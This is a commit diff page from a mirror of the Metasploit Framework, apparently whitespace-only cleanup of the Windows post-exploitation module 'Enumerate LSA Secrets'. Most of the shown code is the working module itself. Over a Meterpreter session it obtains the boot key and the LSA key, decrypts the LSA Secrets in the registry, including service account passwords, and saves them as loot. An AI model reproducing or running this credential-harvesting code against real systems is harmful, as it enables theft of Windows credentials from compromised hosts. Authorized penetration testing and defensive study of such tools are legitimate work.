infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

msftidy up

bug/bundler_fix
Rob Fuller 2013-10-16 22:17:05 -04:00
parent b42687151f
commit 2fbd7ea0ba
1 changed files with 8 additions and 8 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

16
modules/post/windows/gather/credentials/lsa.rb
View File

@ -17,7 +17,7 @@ class Metasploit3 < Msf::Post
'Name' => "Windows Enumerate LSA Secrets", 'Name' => "Windows Enumerate LSA Secrets",
'Description' => %q{ 'Description' => %q{
This module will attempt to enumerate the LSA Secrets keys within the registry. The registry value used is: This module will attempt to enumerate the LSA Secrets keys within the registry. The registry value used is:
HKEY_LOCAL_MACHINE\\Security\\Policy\\Secrets\\. Thanks goes to Maurizio Agazzini and Mubix for decrypt HKEY_LOCAL_MACHINE\\Security\\Policy\\Secrets\\. Thanks goes to Maurizio Agazzini and Mubix for decrypt
code from cachedump. code from cachedump.
}, },
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
@ -211,7 +211,7 @@ class Metasploit3 < Msf::Post
sk_arr = meterpreter_registry_enumkeys(mid_key) sk_arr = meterpreter_registry_enumkeys(mid_key)
sk_arr.each do |mkeys| sk_arr.each do |mkeys|
begin begin
#CurrVal stores the currently set value of the key, in the case of #CurrVal stores the currently set value of the key, in the case of
#services it usually come out as plan text #services it usually come out as plan text
if(mkeys == "CurrVal") if(mkeys == "CurrVal")
val_key = root_key + "\\" + keys + "\\" + mkeys val_key = root_key + "\\" + keys + "\\" + mkeys
@ -226,7 +226,7 @@ class Metasploit3 < Msf::Post
sec = sec[0xC..-1] sec = sec[0xC..-1]
sec = decrypt_secret(sec, lkey).scan(/[[:print:]]/).join sec = decrypt_secret(sec, lkey).scan(/[[:print:]]/).join
end end
if(sec.length > 0) if(sec.length > 0)
if(keys[0,4] == "_SC_") if(keys[0,4] == "_SC_")
user_key = "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\" user_key = "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\"
keys_c = keys[4,keys.length] keys_c = keys[4,keys.length]
@ -241,7 +241,7 @@ class Metasploit3 < Msf::Post
#if the unencrypted value is not blank, print #if the unencrypted value is not blank, print
print_good("Key: #{keys} \n Decrypted Value: #{sec}\n") print_good("Key: #{keys} \n Decrypted Value: #{sec}\n")
sec_str = sec_str << "Key: #{keys} \n Decrypted Value: #{sec}\n" sec_str = sec_str << "Key: #{keys} \n Decrypted Value: #{sec}\n"
end end
end end
else else
next next
@ -262,24 +262,24 @@ class Metasploit3 < Msf::Post
rescue rescue
print_error("Cannot find key.") print_error("Cannot find key.")
end end
return sec_str return sec_str
end end
# The sauce starts here # The sauce starts here
def run def run
print_status('Obtaining boot key...') print_status('Obtaining boot key...')
bootkey = capture_boot_key bootkey = capture_boot_key
#print_status("Boot key: #{bootkey.unpack("H*")[0]}") #print_status("Boot key: #{bootkey.unpack("H*")[0]}")
print_status('Obtaining Lsa key...') print_status('Obtaining Lsa key...')
lsakey = capture_lsa_key(bootkey) lsakey = capture_lsa_key(bootkey)
#print_status("Lsa Key: #{lsakey.unpack("H*")[0]}") #print_status("Lsa Key: #{lsakey.unpack("H*")[0]}")
hostname = session.sys.config.sysinfo['Computer'] hostname = session.sys.config.sysinfo['Computer']
print_status("Executing module against #{hostname}") print_status("Executing module against #{hostname}")
client.railgun.netapi32() client.railgun.netapi32()
begin begin
secrets = hostname << get_secret(lsakey) secrets = hostname << get_secret(lsakey)
print_status("Writing to loot...") print_status("Writing to loot...")
path = store_loot( path = store_loot(
'registry.lsa.sec', 'registry.lsa.sec',